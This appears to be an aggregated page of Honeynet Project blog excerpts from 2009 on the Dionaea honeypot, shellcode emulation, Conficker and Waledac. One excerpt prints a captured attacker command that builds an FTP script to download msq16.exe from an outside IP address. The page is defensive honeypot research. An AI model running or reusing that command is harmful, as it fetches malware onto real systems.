The Honeynet Project

Some people say "Reverse Engineering is an art". Well, this might be true if you consider stuff like mathematics as art. It is more an application of standard methods that evolve constantly. Actually, everybody can learn these methods and start to RE executables. With the RE-Google plugin for IDA Pro, even your granny can start reversing :)

The Dionaea honeypot got more and more mature during the last weeks. As Markus blogged in Iteolih: Miles and More the software is now able to detect shellcode via libemu and generates a nice shellcode profile out of this.

The SMB / DCERPC implementation also got fairly mature and is now able to cope with all packet types and also most caveats and differences of implementations in exploits. As I registered more and more RPC vulnerabilities in the module, it was definitely time to give libemu something to eat! :)

We got a new milestone due:
10.08.2009

• thread-pool works
• stream recording works
• shellcode detection using libemu works
• shellcode emulation using libemu works
• compiles on linux&openbsd

An exploit taken from a public repository, run against the software, is detected and emulated.
To shorten things, basically all required points are hit with current svn.
So, given the time we just saved, some words about how it works.

Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this:

WinExec("cmd /c echo open 78.1.96.200 4871 > o&echo user 1 1 >> o &echo get msq16.exe >> o")
ExitThread(0)

As the required part to download the malware to the remotehost was incomplete, I got curious and wanted a copy.

While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.

During the last weeks I have been working on SMB and specifically DCERPC support for the Dionaea next generation low-interaction honeypot (buzz!).

SMB / CIFS is a huge protocol with several protocol versions and a lot of message types. The CIFS technical reference and the Implementing CIFS book have been constant companions for me since the beginning of the project.

Conficker contains a piece of code that has been object of speculation: It does not infect boxes located in the Ukraine. Before sending an exploit, it performs a lookup against Maxmind's GeoIP database, which is freely available, and skips the host if the returned country code is UA. While the B variant comes with a copy of the database embedded, the A variant downloads the file from Maxmind's server. A couple of days ago Felix had the idea to deliver a specially crafted database that maps every IP address to the Ukrain.

    One project mentored by the Honeynet Project during GSoC aims at improving nebula, an automated intrusion signature generator. There are two critical components in the signature generator: A clustering engine that groups similar attacks into classes, and a signature assembler that extracts common features and selects some of them for the actual signature.

Hello,
due to the length of the whole term Improving the effectiveness of low interaction honeypots, I decided to use Iteolih as uniq abbrevitation. Things are rolling for the project, writing code started, a basic homepage with instructions how to compile/use it was created.
I even had the plan to write about it once or twice, finish something in the code, write about it. When I was done with the code, I got the idea, writing about it was not worth your time.

As the plan is to embedd python as scripting language into the honeypot, I ran a benchmark on a testsuite. The 'testsuite' is a c core which accepts connections, and allows python to deal with the input. The protocol used for benchmarking is http, the service serves a non static html page.
I tested

• 2.6.2_(release26-maint,_Apr_19_2009,_02:15:38)
• 3.0.1+_(r301:69556,_Apr_15_2009,_17:22:45)_
• 3.1a1+_(py3k,_Mar_30_2009,_02:02:26)_

To benchmark, I ran the apache benchmark tool ab

Many people have asked us, how Conficker looks like. That's a tough question for something that's hidden and tries to be as stealthy as possible. The last time somebody asked me: "Can you show me Conficker?", I decided to visualize Conficker. Here is a little video that shows the evil core of Conficker.C.
 

While it seems to be impossible to say whether waledac is the successor of storm or not, what we can do is take a look at the traffic encryption. They guys over at Shadowserver have already blogged some details about this. We at the Giraffe Chapter investigated waledac's communication protocol further. Here are our results.

ORGANIZATION
This year, Felix Leder and Mark Schlösser joined our team. We are focused on active development of honeypot tools and for us writing code is a passion. The Giraffe Chapter now consists of the following people:

• Paul Bächer
• Markus Kötter
• Felix Leder
• Mark Schlösser
• Tillmann Werner
• Georg Wicherski

DEPLOYMENTS

Waledac is wishing merry christmas
There is a new bot in town. It's called Waledac. The way it is spreading reminds a lot of people of the good old storm botnet: An email is sent containing a "christmas card" in form of the executable "postcard.exe".

A preliminary view on the binary has been given by the Shadowserver guys (Steve Adair).

I had the chance to have a first look at the binary (MD5 ccddda141a19d693ad9cb206f2ae0de9) and want to note down some of my few findings to let the hunt begin.

I've been looking on ipv6 lately, and even though I got a global /64 for free from he.net, I'm not that amused about ipv6 yet.

Emulation is an important technology in honeypots and honeynets. It's not always what we want, though, and here's why. As you might know, most bots perform attacks in multiple stages, i.e., they

• send some exploit code to the victim that opens a shell,
• connect to that shell or let the shell connect back,
• invoke commands to download the actual malware binary,
• execute the malware.

Catching the exploit and providing a fake shell isn't too hard, as shown in this post. But we certainly don't want a malware to get executed on our honeypot, not even in an emulated environment. Instead, we want to do different things with it, e.g., submit it to a central service for automated analysis.

Founded in 1999, The Honeynet Project is an international, non-profit (501c3) research organization dedicated to improving the security of the Internet at no cost to the public. With Chapters around the world, our volunteers are firmly committed to the ideals of OpenSource. Our goal, simply put, is to make a difference. We accomplish this goal in the following three ways.